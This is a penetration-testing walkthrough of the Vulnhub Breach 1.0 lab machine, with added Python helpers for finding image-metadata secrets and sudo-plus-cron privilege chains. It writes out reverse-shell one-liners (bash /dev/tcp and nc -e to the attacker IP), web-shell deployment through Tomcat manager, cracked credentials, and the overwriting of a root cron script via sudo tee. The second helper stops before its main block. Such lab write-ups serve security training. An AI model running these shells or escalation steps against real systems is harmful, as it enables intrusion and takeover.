Vulnhub Walkthroughs

About Vulnhub

Vulnhub is a platform that provides a range of vulnerable environments for security enthusiasts to practise penetration testing. Most environments are prebuilt virtual machine images with several deliberately planted vulnerabilities, and they run in VMware or VirtualBox. Each image has a goal to reach, usually Boot2root: from booting the VM to obtaining root on the operating system and reading the flag. Website: https://www.vulnhub.com

Copy the code below, save it as a file with the .html extension, and open it to view the page properly.

<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>Vulnhub Walkthroughs - 红日安全团队</title>
</head>
<body class='typora-export os-windows' >
<div  id='write'  class = 'is-node'><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n7001' class='md-header-anchor '></a> </h2><p> </p><p> </p><h2><a name='header-n7006' class='md-header-anchor '></a>目录</h2><h4><a name='header-n7007' class='md-header-anchor '></a>Vulnhub渗透测试练习(一)-------------------------------Breach1.0</h4><h4><a name='header-n7008' class='md-header-anchor '></a>Vulnhub渗透测试练习(二) ------------------------------Billu_b0x</h4><h4><a name='header-n7009' class='md-header-anchor '></a>Vulnhub渗透测试练习(三) -------------------------------Bulldog1</h4><h4><a name='header-n7010' class='md-header-anchor '></a>Vulnhub渗透测试练习(四)---------------------------------Acid</h4><h4><a name='header-n7011' class='md-header-anchor '></a>Vulnhub渗透测试练习(五)---------------------------------LazysysAdmin-1</h4><h4><a name='header-n7012' class='md-header-anchor '></a>Vulnhub渗透测试练习(六)---------------------------------Freshly</h4><h4><a name='header-n7013' class='md-header-anchor '></a>Vulnhub渗透测试练习(七)---------------------------------FristiLeaks v1.3</h4><h4><a name='header-n7014' class='md-header-anchor '></a>Vulnhub渗透测试练习(八)---------------------------------The Ether</h4><h4><a name='header-n7015' class='md-header-anchor '></a>Vulnhub渗透测试练习(九)---------------------------------zico2</h4><h4><a name='header-n7016' class='md-header-anchor '></a>Vulnhub渗透测试练习(十)---------------------------------Quaoar</h4><h4><a name='header-n7017' class='md-header-anchor '></a>Vulnhub渗透测试练习(十一)---------------------------------SickOs 1.1</h4><h4><a name='header-n7018' class='md-header-anchor '></a>Vulnhub渗透测试练习(十二)---------------------------------BSides-Vancouver-2018-Workshop</h4><h4><a name='header-n7019' class='md-header-anchor '></a>Vulnhub渗透测试练习(十三)---------------------------------Kioptrix 1</h4><h4><a name='header-n7020' class='md-header-anchor 
'></a>Vulnhub渗透测试练习(十四)----------------------------------Zico2</h4><h4><a name='header-n7021' class='md-header-anchor '></a>Vulnhub渗透测试练习(十五)----------------------------------Kioptrix 3</h4><h4><a name='header-n7022' class='md-header-anchor '></a>Vulnhub渗透测试练习(十六)----------------------------------Kioptrix 4</h4><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub靶场题解 - 红日安全团队</h1><h2><a name='header-n7038' class='md-header-anchor '></a>Vulnhub简介</h2><p>Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:<a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>第一节 Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n7044' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>靶机说明</h3><p>Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。</p><p>VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。</p><h3><a name='header-n7052' class='md-header-anchor '></a>目标</h3><p>Boot to root:获得root权限,查看flag。</p><h3><a name='header-n7055' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。</li><li>攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.220,安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>信息收集</h2><ul><li>端口服务识别</li></ul><p>启动Breach1.0虚拟机,由于IP已知,使用nmap扫描端口,并做服务识别和深度扫描(加-A参数),扫描结果保存到txt文件,命令:</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现端口几乎全开放了,显然是有问题,虚拟机对端口扫描做了一些防护措施,直接访问80端口,进入web首页:<code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7078' class='md-header-anchor '></a>漏洞挖掘</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01:查看首页源码,解码得到密码</h3><p>(1) 查看首页源码,发现提示:<code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code> 这是一串base64编码。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 将其复制到Burpsuit Decoder进行base64解码,解密后发现还是base64编码,继续base64解码,得到<code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02:登录cms,查看邮件,下载包含SSL证书的密钥库keystore文件</h3><p>(1) 点击首页的图片,进入<code>initech.html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 点击initech.html左边的<code>Employee portal</code>进入到<code>http://192.168.110.140/impresscms/user.php</code> 这是一个impresscms登录页</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用之前两次base64解码得到的密码登录impresscms:</p><p>用户名:<code>pgibbons</code></p><p>密码:<code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) exploit-db.com查找impress cms漏洞:发现ImpressCMS 1.3.9 
SQL注入漏洞:<code>https://www.exploit-db.com/exploits/39737/</code>,可注入页面为<code>/modules/profile/admin/field.php</code>,但是该页面目前没有权限访问,无法进行注入。</p><p>(4) 注意左边的收件箱Inbox显示有3封邮件,依次打开看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>第1封邮件,主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第2封邮件,主要内容:Michael采购了IDS/IPS。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(5) 访问<code>http://192.168.110.140/.keystore</code>下载包含SSL证书的密钥库keystore文件,keystore是存储公私密钥的一种文件格式。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /> </p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03:导入流量抓包文件、SSL证书到Wireshark</h3><p>(1) 依次访问左边的菜单树,点击每个菜单栏:</p><p>content链接了一张图片troll.gif:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>点击profile会进入目录浏览:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>但都没发现可利用漏洞,继续浏览每个网页。</p><p>(2) 点击<code>View Account</code>菜单进入界面,再依次点击页面的<code>Content</code>,会弹出一行链接<code>Content SSL implementation test capture</code>,点击链接,如下图:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(3) 
进入<code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>页面,可以看到一个名为:<code>_SSL_test_phase1.pcap</code>的Wireshark流量包文件,下载它。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>同时,该页面有重要的提示信息:这个pCAP文件是有红色团队的重新攻击产生的,但是不能读取文件。而且<code>They told me the alias, storepassword and keypassword are all set to 'tomcat'</code>别名、Keystore密码、key密码都设置成<code>tomcat</code>。</p><p>由此推测:a.这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码;b.系统中可能存在tomcat。</p><p>(4) Windows攻击机安装有JDK,到JDK目录下找到keytool.exe工具:路径<code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书,命令<code>keytool -list -keystore c:\keystore</code> 输入密钥库口令tomcat:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:</p><p>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) 将.p12证书导入Wireshark</p><p>.p12证书存储在C盘根目录,将证书导入Wireshark:在Wireshark中打开<code>_SSL_test_phase1.pcap</code>流量包文件,选择菜单:编辑--首选项--Protocols--SSL,点击右边的Edit:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>输入:192.168.110.140 8443 http 点击选择证书文件 输入密码tomcat</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04: Recovering the Tomcat manager URL and password from the capture</h3><p>(1) With the key loaded, the HTTPS traffic is decrypted; inspect each HTTP packet:</p><p>There is attack traffic from 192.168.110.129 to 192.168.110.140: a command-execution web shell ran the id command and the attacker uploaded two images, probably image web shells. That command shell cannot be reached directly, though; the Tomcat manager login is needed first:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Obtaining the Tomcat manager URL, username and password</p><p>Further into the capture there is a 401 Unauthorized exchange; its request and response give the Tomcat manager URL: <code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A later request carries the credentials as HTTP Basic authentication: <code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>That is the base64-encoded username and password. Paste <code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code> into the Burp Suite Decoder to recover the Tomcat credentials:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat manager username: tomcat, password: Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05: Getting a shell through the Tomcat manager</h3><p>(1) Log in to the Tomcat manager:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Deploying a WAR through the Tomcat manager 
is the standard way to get a shell: take your collection of JSP web shells (a small command shell, a China Chopper (caidao) shell and the JspSpy shell were used here), pack them into caidao.zip, rename the archive to caidao.war, then upload and deploy the WAR:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Upload the WAR under "WAR file to deploy":</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the upload the new /caidao application appears in the list; the uploaded JSP shells live under that path.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Connect China Chopper to <code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Open the China Chopper terminal and run id;pwd successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) A problem shows up: the uploaded shell disappears after a short while (the file is deleted) and the WAR has to be re-uploaded before China Chopper works again. The host looked as if it had antivirus or a web-shell cleaner (the real cause, a cron cleanup job, turns up during privilege escalation below). Workaround: spawn a bash reverse shell.</p><h2><a name='header-n7231' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06: Enumerating system users and finding the MySQL root password</h3><p>(1) List the system users and look for UIDs of 1000 and above: cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Two users are worth attention: milton and blumbergh</p><p>(2) In China Chopper, locate the web root. The file browser starts in the Tomcat directory; the web deployment directory is <code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) That directory holds two oddly named PHP files with long, random-looking names, fe4db1f7bc038d60776dcb66ab3404d5.php and 0d93f85c5061c44cdffeb8381b2772fd.php. Download them with China Chopper and open them:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' 
referrerPolicy='no-referrer' /></p><p>These are MySQL connection files: they connect as the MySQL root account with an empty password.</p><p>(4) Because the China Chopper shell keeps getting deleted, push a reverse shell to nc instead. From the China Chopper terminal, send a shell back to nc on the Windows attack box with <code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Connect to MySQL and list its users. Inside the reverse shell the mysql client showed nothing after the commands were typed; the result only appeared after exit ended the session (most likely because the client's output is buffered when its stdout is not a terminal). Commands:</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p>Running the query non-interactively sidesteps the problem: <code>mysql -u root -e "select user,password from mysql.user"</code> prints the result immediately.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Password hash obtained for user milton: <code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>Looking it up on <code>https://www.somd5.com/</code> gives milton's plaintext password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07: Escalating to the milton and blumbergh users</h3><p>(1) su refuses to run and complains that a terminal is required, a problem met before and solved with one line of Python:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Switch to user milton</p><p><code>su - milton</code>  password: thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p> The some_script.sh file in milton's home directory holds nothing useful.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 
Check the kernel version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The kernel is Linux Breach 4.2.0-27-generic, which is outside the range of the well-known Ubuntu local privilege escalation exploit; that one targets Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04).</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) The command history holds no useful clue beyond showing that su was used to switch to the blumbergh user. So blumbergh's password is needed.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Seven images have turned up so far, six in the image directory <code>http://192.168.110.140/images/</code> and one in milton's home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>my_badge.jpg in milton's home directory</code></p><p>Copy the images to Kali Linux, run strings over each one, append the output to images.txt and read it in vim; the password is inside bill.png.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Possible password or hint found:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The only standalone word is: <code>coffeestains</code></p><p>Alternatively, read bill.png's metadata with exiftool.exe, which yields the same candidate password: <code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' 
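referrerPolicy='no-referrer' /></p><p>strings and exiftool both find the password because image metadata (a PNG tEXt chunk, a JPEG COM segment) is stored as plain text inside the file. As an added example (not part of the original walkthrough), the following Python parses that metadata directly, falls back to a strings(1)-style scan for anything else, and lists metadata text first, since that is where a planted hint is most likely to sit. It generalises beyond bill.png to any PNG or JPEG; the two sample files are constructed inline and the comment values in them are made up for the demonstration.</p>

```python
import re
import struct
import zlib

PNG_MAGIC = b'\x89PNG\r\n\x1a\n'


def png_text_chunks(data):
    """Return (keyword, text) pairs from PNG tEXt, zTXt and iTXt chunks (what exiftool lists as metadata)."""
    found = []
    if not data.startswith(PNG_MAGIC):
        return found
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if ctype == b'tEXt':
            key, _, text = body.partition(b'\x00')
            found.append((key.decode('latin-1'), text.decode('latin-1')))
        elif ctype == b'zTXt':
            key, _, rest = body.partition(b'\x00')         # rest[0] is the compression method (0 = zlib)
            found.append((key.decode('latin-1'), zlib.decompress(rest[1:]).decode('latin-1')))
        elif ctype == b'iTXt':
            key, _, rest = body.partition(b'\x00')
            compressed, rest = rest[0], rest[2:]            # compression flag, then compression method
            _language, _, rest = rest.partition(b'\x00')
            _translated_key, _, text = rest.partition(b'\x00')
            if compressed:
                text = zlib.decompress(text)
            found.append((key.decode('latin-1'), text.decode('utf-8', 'replace')))
        elif ctype == b'IEND':
            break
        pos += 8 + length + 4                                # header, data, CRC
    return found


def jpeg_comments(data):
    """Return the text of JPEG COM segments (marker 0xFFFE) that precede the entropy-coded image data."""
    found = []
    if not data.startswith(b'\xff\xd8'):
        return found
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):                           # EOI or SOS: no more metadata segments
            break
        seglen = struct.unpack('>H', data[pos + 2:pos + 4])[0]
        if marker == 0xFE:
            found.append(data[pos + 4:pos + 2 + seglen].decode('latin-1'))
        pos += 2 + seglen
    return found


def printable_strings(data, minlen=8):
    """Equivalent of strings(1): runs of at least minlen printable ASCII bytes."""
    return [m.group().decode('ascii') for m in re.finditer(rb'[\x20-\x7e]{%d,}' % minlen, data)]


def candidate_secrets(data):
    """Metadata text first (the strongest hint), then any other long printable run as a fallback."""
    metadata = [text for _, text in png_text_chunks(data)] + jpeg_comments(data)
    return metadata + [s for s in printable_strings(data) if s not in metadata]


def _png_chunk(ctype, body):
    return struct.pack('>I', len(body)) + ctype + body + struct.pack('>I', zlib.crc32(ctype + body) & 0xffffffff)


# Constructed samples: a 1x1 PNG with a tEXt and a zTXt chunk, and a JPEG header carrying a COM segment.
SAMPLE_PNG = (PNG_MAGIC
              + _png_chunk(b'IHDR', struct.pack('>IIBBBBB', 1, 1, 8, 0, 0, 0, 0))
              + _png_chunk(b'tEXt', b'Comment\x00coffeestains')
              + _png_chunk(b'zTXt', b'Note\x00\x00' + zlib.compress(b'zipped hint'))
              + _png_chunk(b'IDAT', zlib.compress(b'\x00\x00'))
              + _png_chunk(b'IEND', b''))
_COMMENT = b'hint: coffeestains'
SAMPLE_JPEG = b'\xff\xd8\xff\xfe' + struct.pack('>H', 2 + len(_COMMENT)) + _COMMENT + b'\xff\xd9'

if __name__ == '__main__':
    import sys
    for path in sys.argv[1:]:                                # real files given on the command line
        with open(path, 'rb') as fh:
            print(path, candidate_secrets(fh.read()))
    print('sample png :', candidate_secrets(SAMPLE_PNG))
    print('sample jpeg:', candidate_secrets(SAMPLE_JPEG))
```

<p>Point it at the seven images above to get the metadata text of each one in a single pass; GIF files have no comparable text chunk parser here and fall through to the printable-run scan.</p><p><img alt='' 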
referrerPolicy='no-referrer' /></p><p>(6) Switch to the blumbergh user</p><p>Username: blumbergh <br/></p><p>Password: coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7) blumbergh's command history mentions /usr/share/cleanup and a tidyup.sh script:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Read and analyse tidyup.sh:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>This is a cleanup script; its description says it runs every 3 minutes and deletes files under the webapps directory. That is why the uploaded China Chopper shell kept vanishing and had to be re-uploaded.</p><p>Check the permissions on tidyup.sh: the current user cannot write it, only root can</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Check the sudo rights with sudo -l:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The user may run two things as root: the tee program and the tidyup.sh script, /usr/bin/tee and /usr/share/cleanup/tidyup.sh</p><p>tee reads standard input and writes it to a file (as well as to standard output). tidyup.sh is the cleanup script.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x08: Spawning a root reverse shell and reading the flag</h3><p>(1) Write a reverse-shell command into tidyup.sh</p><p>tidyup.sh is writable only by root, but tee can be run as root, so tee can write tidyup.sh. First put the reverse-shell command into shell.txt; the bash reverse-shell one-liner did not work here, but nc did, so write the nc command:</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt</code></p><p>Then feed shell.txt through tee into tidyup.sh. Note that tee without -a truncates the target, so the cleanup logic is replaced outright; tee -a would append the payload and leave the original script working:</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>Verify that tidyup.sh now contains the payload:</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img 
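/></p><p>The chain used here is generic: a sudo rule that lets you run a file-writing program as root (tee, dd, cp, an editor) plus a script that cron runs as root yields a root shell on the next cron tick. As an added example (not part of the original walkthrough), the following Python parses sudo -l output and an /etc/crontab and reports every such pair, so the pattern can be checked quickly on a new host. Both inputs are constructed samples shaped like this box; the NOPASSWD tag and the */3 schedule are assumptions, since the page only reports the two sudo-able commands and the 3-minute interval.</p>

```python
import os
import re

# Programs that write an arbitrary file when run as root (a subset of the usual GTFOBins list)
WRITE_PRIMITIVES = {'tee', 'dd', 'cp', 'mv', 'vi', 'vim', 'nano', 'python', 'perl'}

# "(root) NOPASSWD: /usr/bin/tee, /usr/share/cleanup/tidyup.sh" -> run-as, tags, command list
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')
# /etc/crontab style: five schedule fields, a user, then the command
CRON_LINE_RE = re.compile(r'^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$')


def parse_sudo_l(text):
    """Parse the rule lines of `sudo -l` output into (runas, nopasswd, command) tuples."""
    rules = []
    for line in text.splitlines():
        match = SUDO_RULE_RE.match(line)
        if not match:
            continue
        runas = match.group('runas').split(':')[0].strip()      # "(root : root)" -> root
        nopasswd = 'NOPASSWD' in match.group('tags')
        for cmd in match.group('cmds').split(','):
            cmd = cmd.strip()
            if cmd:
                rules.append((runas, nopasswd, cmd))
    return rules


def parse_system_crontab(text):
    """Parse /etc/crontab or /etc/cron.d lines into (schedule, user, command); skip comments and VAR= lines."""
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith('#') or '=' in stripped.split()[0]:
            continue
        match = CRON_LINE_RE.match(line)
        if match:
            jobs.append((' '.join(match.group('sched').split()), match.group('user'), match.group('cmd').strip()))
    return jobs


def root_write_chains(sudo_text, crontab_text):
    """Pair every root-run file-write primitive from sudo with every script that cron runs as root."""
    writers = [cmd for runas, _, cmd in parse_sudo_l(sudo_text)
               if runas in ('root', 'ALL') and os.path.basename(cmd.split()[0]) in WRITE_PRIMITIVES]
    root_scripts = [cmd.split()[0] for _, user, cmd in parse_system_crontab(crontab_text)
                    if user == 'root' and cmd.split()[0].startswith('/')]
    return [(writer, script) for writer in writers for script in root_scripts]


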